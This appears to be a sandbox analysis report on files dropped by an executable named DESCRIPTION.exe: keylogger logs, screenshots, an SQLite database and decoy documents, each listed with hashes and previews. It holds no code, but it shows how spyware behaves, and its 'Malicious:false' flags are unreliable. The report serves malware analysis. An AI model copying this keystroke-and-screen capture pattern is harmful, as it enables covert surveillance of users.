                                                              SHA-512:D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
                                                              Malicious:false
                                                              Preview:ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.pdf

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.697427014915338
                                                              Encrypted:false
                                                              SSDEEP:24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
                                                              MD5:2D7ACA56B5F340F28DD1D2B46D700BA6
                                                              SHA1:3966684FF029665614B8DC948349178FB9E8C078
                                                              SHA-256:B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
                                                              SHA-512:D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
                                                              Malicious:false
                                                              Preview:ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZQIXMVQGAH.docx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.702263764575455
                                                              Encrypted:false
                                                              SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                              MD5:1680F18135FD9FE517865D4B70BCA69F
                                                              SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                              SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                              SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                              Malicious:false
                                                              Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataGBSjYmJb.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1287
                                                              Entropy (8bit):4.343545463455434
                                                              Encrypted:false
                                                              SSDEEP:24:teaBaBaBaBaBaqqqqqqqpppppppccccccjjjjjjjjGGGGn:gaBaBaBaBaBaqqqqqqqpppppppcccccU
                                                              MD5:E6396E44B4DF4B63CFCC8647F31C8E9A
                                                              SHA1:04C9E0045D3255669363D4F993A217A0DDB93630
                                                              SHA-256:F16480C6CA01F7BA04F29A86CCE7179655D9F914E12D6A4C3AE87ED5FBFC20C3
                                                              SHA-512:E5F4320E8941728C4C3AA802D9E6722DCCCD47EDF99BC39B8688CB4C5F274EBFC8F3E200B2B07D26607B27A8E369CDA5B5AE133CD33E304555C030FBC0EB7B68
                                                              Malicious:false
                                                              Preview:..[07:22:09]<<Program Manager>>....[07:22:09]<<Program Manager>>....[07:22:09]<<Program Manager>>....[07:22:09]<<Program Manager>>....[07:22:09]<<Program Manager>>....[07:22:09]<<Program Manager>>....[07:22:10]<<Program Manager>>....[07:22:10]<<Program Manager>>....[07:22:10]<<Program Manager>>....[07:22:10]<<Program Manager>>....[07:22:10]<<Program Manager>>....[07:22:10]<<Program Manager>>....[07:22:10]<<Program Manager>>....[07:22:11]<<Program Manager>>....[07:22:11]<<Program Manager>>....[07:22:11]<<Program Manager>>....[07:22:11]<<Program Manager>>....[07:22:11]<<Program Manager>>....[07:22:11]<<Program Manager>>....[07:22:11]<<Program Manager>>....[07:22:12]<<Program Manager>>....[07:22:12]<<Program Manager>>....[07:22:12]<<Program Manager>>....[07:22:12]<<Program Manager>>....[07:22:12]<<Program Manager>>....[07:22:12]<<Program Manager>>....[07:22:13]<<Program Manager>>....[07:22:13]<<Program Manager>>....[07:22:13]<<Program Manager>>....[07:22:13]<<Program Manager>>....[07:22:1

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataGlLPGWOk.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):363
                                                              Entropy (8bit):4.371680930393109
                                                              Encrypted:false
                                                              SSDEEP:3:tSXXv4fE4g/Xv4fE4g/Xv4fE4g/Xv4fE4g/XsAfE4g/XsAfE4g/XsAfE4g/XsAfJ:tS+0W0W0W0kW0kW0kW0kW0kW0kW0k1Zx
                                                              MD5:76EE0C06F59E0A31A808BA28C4007424
                                                              SHA1:F85F6082404BDFF75D19087A5CA97471685D5A75
                                                              SHA-256:B5D9C6218A5AA8641087CFB920EBEE374581D6C0DAC3117E37355F09CFF48FC6
                                                              SHA-512:A878D4549B2C7D9C287ADCE0A180A2F7B5061D0D422732B1DB78722C5F6EA0265A3664B8BB030BFFCBA409402BF10B2258238F93A77AE5AD738B7EA4999472A6
                                                              Malicious:false
                                                              Preview:..[07:22:35]<<Program Manager>>....[07:22:35]<<Program Manager>>....[07:22:35]<<Program Manager>>....[07:22:35]<<Program Manager>>....[07:22:36]<<Program Manager>>....[07:22:36]<<Program Manager>>....[07:22:36]<<Program Manager>>....[07:22:36]<<Program Manager>>....[07:22:36]<<Program Manager>>....[07:22:36]<<Program Manager>>....[07:22:40]<<Program Manager>>..

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataNErTutaN.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):363
                                                              Entropy (8bit):4.386161085376847
                                                              Encrypted:false
                                                              SSDEEP:6:tSEZN0MZN0MZN0MZN0MZN0D1Z0D1Z0D1Z0D1Z0D1Z0+px:tl0C0C0C0C0z0z0z0z0z0qx
                                                              MD5:76E11946D010268D5D9DEBEBA9F2DB3D
                                                              SHA1:BD736A5291421133EADD1C7E41C6509058996B6C
                                                              SHA-256:5F483FF754703B24AAB71D8C309DC1E16EE9E9931CBD8DA4180B627F5D8A9D4F
                                                              SHA-512:B0AB8155B070580D875CA381944387206886480D883328435A53601CAD07FF6D6037D5937BDF6B0D037B3393DABA2126561382D2DAEA3021B1D21ED025ED1C1B
                                                              Malicious:false
                                                              Preview:..[07:22:48]<<Program Manager>>....[07:22:48]<<Program Manager>>....[07:22:48]<<Program Manager>>....[07:22:48]<<Program Manager>>....[07:22:48]<<Program Manager>>....[07:22:49]<<Program Manager>>....[07:22:49]<<Program Manager>>....[07:22:49]<<Program Manager>>....[07:22:49]<<Program Manager>>....[07:22:49]<<Program Manager>>....[07:22:53]<<Program Manager>>..

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataUNWGMQvz.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):429
                                                              Entropy (8bit):4.303399760028361
                                                              Encrypted:false
                                                              SSDEEP:12:tlZ0uZ0uZ0uZ0uZ0uZ0uZ09090909090m4fx:tlOuOuOuOuOuOuOqqqqqP5
                                                              MD5:56D460B3679ABE1EFADBECD3A6247990
                                                              SHA1:8A0F196181585807F7A64410772A1FEEBEEDEAAD
                                                              SHA-256:98CD2574345959D2CDC1D0138D327117A56446A803A3BD1E541414A2FA9AF725
                                                              SHA-512:B39F5A56E8979428DCA5045412C08FB34E208172D57FED0F20704E3B4AE412F7C353CF0E83DBD03826965432C3CDB117017D5A2191EC3272BAC9FA0560F5E895
                                                              Malicious:false
                                                              Preview:..[07:22:28]<<Program Manager>>....[07:22:28]<<Program Manager>>....[07:22:28]<<Program Manager>>....[07:22:28]<<Program Manager>>....[07:22:28]<<Program Manager>>....[07:22:28]<<Program Manager>>....[07:22:28]<<Program Manager>>....[07:22:29]<<Program Manager>>....[07:22:29]<<Program Manager>>....[07:22:29]<<Program Manager>>....[07:22:29]<<Program Manager>>....[07:22:29]<<Program Manager>>....[07:22:34]<<Program Manager>>..

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataVqynSimp.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):759
                                                              Entropy (8bit):4.238398345852865
                                                              Encrypted:false
                                                              SSDEEP:12:tJp0Qp0s0s0s0s0s0s0s0V0V0V0V0V0V0V0EN0EN0EN0EN0EN0EN0ENx:tJ+Q+RRRRRRRSSSSSSSEaEaEaEaEaEaw
                                                              MD5:D0F8AF945323DF4351E055EB33A37DFC
                                                              SHA1:DBFFD032FA371606B8A358A8CB52403E227E482A
                                                              SHA-256:2C6293D415F390CCA33438590D3B74A7E2891A5E25C5CAC68E4B3036C6D4B138
                                                              SHA-512:B6F20BE591C89E3BA706725B76C7A5CA1032F8B73BF4C218F76B129A197462819F511A74FEB9CBA01B035327E933CAC11E238E9DDDCEEAF19B0E81342CA94B61
                                                              Malicious:false
                                                              Preview:..[07:22:19]<<Program Manager>>....[07:22:19]<<Program Manager>>....[07:22:20]<<Program Manager>>....[07:22:20]<<Program Manager>>....[07:22:20]<<Program Manager>>....[07:22:20]<<Program Manager>>....[07:22:20]<<Program Manager>>....[07:22:20]<<Program Manager>>....[07:22:20]<<Program Manager>>....[07:22:21]<<Program Manager>>....[07:22:21]<<Program Manager>>....[07:22:21]<<Program Manager>>....[07:22:21]<<Program Manager>>....[07:22:21]<<Program Manager>>....[07:22:21]<<Program Manager>>....[07:22:21]<<Program Manager>>....[07:22:22]<<Program Manager>>....[07:22:22]<<Program Manager>>....[07:22:22]<<Program Manager>>....[07:22:22]<<Program Manager>>....[07:22:22]<<Program Manager>>....[07:22:22]<<Program Manager>>....[07:22:22]<<Program Manager>>..

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataWrlEoSmg.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):396
                                                              Entropy (8bit):4.305808792395578
                                                              Encrypted:false
                                                              SSDEEP:6:tSZp0KZ0KZ0KZ0KZ0KZ0KZ0KZ0bN0bN0bN0Fx:tk0w0w0w0w0w0w0w0bN0bN0bN0Fx
                                                              MD5:BE03633C7BB5B530FFFEBEF4F54F8CEC
                                                              SHA1:29CB639E14C21886C9992E13C117EC261190F9A6
                                                              SHA-256:D3195A0265E276C05ADF0294049FB53FF326A29B7E68480FB20F81039530E7A4
                                                              SHA-512:726C9FC454EAEA4A81D5D8D124D9882764BE01EC4A5400E48C949C79E70F57A9FAB0147466D9298A91A0E9BBAA6B0695012B2F081FBACFF31143232236AA7AAE
                                                              Malicious:false
                                                              Preview:..[07:22:41]<<Program Manager>>....[07:22:42]<<Program Manager>>....[07:22:42]<<Program Manager>>....[07:22:42]<<Program Manager>>....[07:22:42]<<Program Manager>>....[07:22:42]<<Program Manager>>....[07:22:42]<<Program Manager>>....[07:22:42]<<Program Manager>>....[07:22:43]<<Program Manager>>....[07:22:43]<<Program Manager>>....[07:22:43]<<Program Manager>>....[07:22:47]<<Program Manager>>..

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataYRTmqAXe.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3597
                                                              Entropy (8bit):4.422634800474924
                                                              Encrypted:false
                                                              SSDEEP:96:dmmmmmmm11111ooooooofffffffKKKKK8TMMMMMMMZZZZZZZZaaaaaaa3333333L:dmmmmmmm11111ooooooofffffffKKKKL
                                                              MD5:AA056A764F78CE886CE2008CD0D9592F
                                                              SHA1:2EEE7C371BABDD7840B838A1A887C7DD2AFE6C99
                                                              SHA-256:4F8FEE53A52E40BFA3413CAFC28681D6A74220C339707DC7056F7D722B44B5B9
                                                              SHA-512:11310FBE3F23A3FF723719CDF767782BED65FBFC338FB5C7B04826FB227C89225BC88A52C4BBBD6D8CC372D87936D5958D811B640458AEA40091FE11F309490D
                                                              Malicious:false
                                                              Preview:..[07:21:20]<<Program Manager>>....[07:21:20]<<Program Manager>>....[07:21:20]<<Program Manager>>....[07:21:20]<<Program Manager>>....[07:21:20]<<Program Manager>>....[07:21:20]<<Program Manager>>....[07:21:20]<<Program Manager>>....[07:21:20]<<Program Manager>>....[07:21:21]<<Program Manager>>....[07:21:21]<<Program Manager>>....[07:21:21]<<Program Manager>>....[07:21:21]<<Program Manager>>....[07:21:21]<<Program Manager>>....[07:21:22]<<Program Manager>>....[07:21:22]<<Program Manager>>....[07:21:22]<<Program Manager>>....[07:21:22]<<Program Manager>>....[07:21:22]<<Program Manager>>....[07:21:22]<<Program Manager>>....[07:21:22]<<Program Manager>>....[07:21:23]<<Program Manager>>....[07:21:23]<<Program Manager>>....[07:21:23]<<Program Manager>>....[07:21:23]<<Program Manager>>....[07:21:23]<<Program Manager>>....[07:21:23]<<Program Manager>>....[07:21:23]<<Program Manager>>....[07:21:24]<<Program Manager>>....[07:21:24]<<Program Manager>>....[07:21:24]<<Program Manager>>....[07:21:2

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatajGpJWZFT.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):2310
                                                              Entropy (8bit):4.398915688286933
                                                              Encrypted:false
                                                              SSDEEP:48:iJ1mmmmmmmmfffffffoooooooKaKaKaKaKaKaKayyyyyyyzzzzzzzssssssss55H:iJ1mmmmmmmmfffffffoooooooKaKaKaM
                                                              MD5:820ADB4E49A30BC20D5FF350240953CE
                                                              SHA1:38B7058D2546CF94978A398E30113FE6DC68C1BE
                                                              SHA-256:D314606D2B2F8DB4FF6366BF0709ACC00A7044A712B437F26AB3FFDFD0BC68FC
                                                              SHA-512:85765F59F0BACB2AEF5A6A3EAC0859EBFC886431A09559D3F76D76B9F6F33543C90BA23661E92480BCEC9D2FE804D97259F94364D0FF94471C0F25B285609471
                                                              Malicious:false
                                                              Preview:..[07:21:50]<<Program Manager>>....[07:21:50]<<Program Manager>>....[07:21:54]<<Program Manager>>....[07:21:55]<<Program Manager>>....[07:21:55]<<Program Manager>>....[07:21:55]<<Program Manager>>....[07:21:55]<<Program Manager>>....[07:21:55]<<Program Manager>>....[07:21:55]<<Program Manager>>....[07:21:55]<<Program Manager>>....[07:21:55]<<Program Manager>>....[07:21:56]<<Program Manager>>....[07:21:56]<<Program Manager>>....[07:21:56]<<Program Manager>>....[07:21:56]<<Program Manager>>....[07:21:56]<<Program Manager>>....[07:21:56]<<Program Manager>>....[07:21:56]<<Program Manager>>....[07:21:57]<<Program Manager>>....[07:21:57]<<Program Manager>>....[07:21:57]<<Program Manager>>....[07:21:57]<<Program Manager>>....[07:21:57]<<Program Manager>>....[07:21:57]<<Program Manager>>....[07:21:57]<<Program Manager>>....[07:21:58]<<Program Manager>>....[07:21:58]<<Program Manager>>....[07:21:58]<<Program Manager>>....[07:21:58]<<Program Manager>>....[07:21:58]<<Program Manager>>....[07:21:5

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatakniIuuOY.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):396
                                                              Entropy (8bit):4.30156985668831
                                                              Encrypted:false
                                                              SSDEEP:12:t3Hf0AHf0Aaf0Aaf0Aaf0Aaf0Aaf0Aaf0Aaf0Azp0Ah0Ahx:t3HcAHcAJAJAJAJAJAJAJAKAmAD
                                                              MD5:3536F206B1583F313D6BC6979F9AB534
                                                              SHA1:BA1E6370B175FE9041FB66F839DD210E84DBDD74
                                                              SHA-256:4E96C3E544794A723424D46090203D290A6A75C3E3B1C0C0764D50A81397D95A
                                                              SHA-512:81180C70055F0334D846216E4AEBD2211ECF0DD4F952A8AF6C60CA65B18FDE5945EB2BE2810A6182C7858C3D2386C5F2321305DF46825B316AC8A6B2BFEB2EC4
                                                              Malicious:false
                                                              Preview:..[07:23:01]<<Program Manager>>....[07:23:01]<<Program Manager>>....[07:23:02]<<Program Manager>>....[07:23:02]<<Program Manager>>....[07:23:02]<<Program Manager>>....[07:23:02]<<Program Manager>>....[07:23:02]<<Program Manager>>....[07:23:02]<<Program Manager>>....[07:23:02]<<Program Manager>>....[07:23:03]<<Program Manager>>....[07:23:07]<<Program Manager>>....[07:23:07]<<Program Manager>>..

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatanYvTSQpf.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):363
                                                              Entropy (8bit):4.32559267572167
                                                              Encrypted:false
                                                              SSDEEP:6:tS8W0UW0UW0Qp0Qp0Qp0Qp0Qp0Qp0Qp0efux:tS0V0V0Qp0Qp0Qp0Qp0Qp0Qp0Qp0Aux
                                                              MD5:E057768ECC949CF5EA0A2F3F8CDF5D5C
                                                              SHA1:F2E2F4A3211BF8A57EA8884006F5419FD5961D98
                                                              SHA-256:6CF3C0493A11722BAB53DB0D85D24FB48931D86D1DC27988FAA3D15D771F24EE
                                                              SHA-512:4BF9CFDE07854FB39A586A7C0B6B13073251A742191515BAD1B1DB57AB1DF290FADFB4F3C6BE422A8366675C1155712B2CB01CB70231D4DAD459BD88D1CB40E7
                                                              Malicious:false
                                                              Preview:..[07:22:54]<<Program Manager>>....[07:22:54]<<Program Manager>>....[07:22:54]<<Program Manager>>....[07:22:55]<<Program Manager>>....[07:22:55]<<Program Manager>>....[07:22:55]<<Program Manager>>....[07:22:55]<<Program Manager>>....[07:22:55]<<Program Manager>>....[07:22:55]<<Program Manager>>....[07:22:55]<<Program Manager>>....[07:23:00]<<Program Manager>>..

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatauRYIcDki.txt

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):363
                                                              Entropy (8bit):4.381731715679187
                                                              Encrypted:false
                                                              SSDEEP:6:tSGfm0efm0efm0efm0efm0ef30ef30ef30ef30efPUZf0efPUZfx:t3m0Am0Am0Am0Am0A30A30A30A30A8Nc
                                                              MD5:5B5CE25CACDA06FE0E4D848C5A821D4F
                                                              SHA1:7358E4D2B2D50FA22F3F1DB861E44BF698EEB63B
                                                              SHA-256:3690919ACDFEB456364A902ED0C68B3F641C1C7E6590BB698DB470E02AA46D3B
                                                              SHA-512:3D14619EFB6BEB98980192E2CA40C9B9E0960BBFFD78F5964F30117CAF72BC43DB730653BF15EA07D56A07EAD092E8313AA0E1969E53ABA9B826470D8A726E62
                                                              Malicious:false
                                                              Preview:..[07:23:08]<<Program Manager>>....[07:23:08]<<Program Manager>>....[07:23:08]<<Program Manager>>....[07:23:08]<<Program Manager>>....[07:23:08]<<Program Manager>>....[07:23:09]<<Program Manager>>....[07:23:09]<<Program Manager>>....[07:23:09]<<Program Manager>>....[07:23:09]<<Program Manager>>....[07:23:13]<<Program Manager>>....[07:23:13]<<Program Manager>>..

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogfisslehbQlYkgroFYogLHXZKSUzhGekoogWGBPjtfAuuepjaXbgfishfall

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotDWBZCcpE.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.777664769555092
                                                              Encrypted:false
                                                              SSDEEP:12288:Uu3TDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJk:nTevz4i97IQps+xQADJ7W/X7A
                                                              MD5:88B83BC504312BDD9D59B56BB342F588
                                                              SHA1:3141EC6DE3EDDAEBD4CCA5C10D09FE541EE66AF5
                                                              SHA-256:97E1E7E8310EC51BCD692A4BC220BC83FF0ABC406539FB3D7A9D824716162C03
                                                              SHA-512:34FF1DD676B7160836139319516B44F137286646059EBE648044DE141FB2F68CB5AB49C8EEF34120836AE913E0C82972AD965110549C9D6CB3D138E70CAA903F
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotHDWTDVWd.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:modified
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.777664769555092
                                                              Encrypted:false
                                                              SSDEEP:12288:Uu3TDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJk:nTevz4i97IQps+xQADJ7W/X7A
                                                              MD5:88B83BC504312BDD9D59B56BB342F588
                                                              SHA1:3141EC6DE3EDDAEBD4CCA5C10D09FE541EE66AF5
                                                              SHA-256:97E1E7E8310EC51BCD692A4BC220BC83FF0ABC406539FB3D7A9D824716162C03
                                                              SHA-512:34FF1DD676B7160836139319516B44F137286646059EBE648044DE141FB2F68CB5AB49C8EEF34120836AE913E0C82972AD965110549C9D6CB3D138E70CAA903F
                                                              Malicious:false
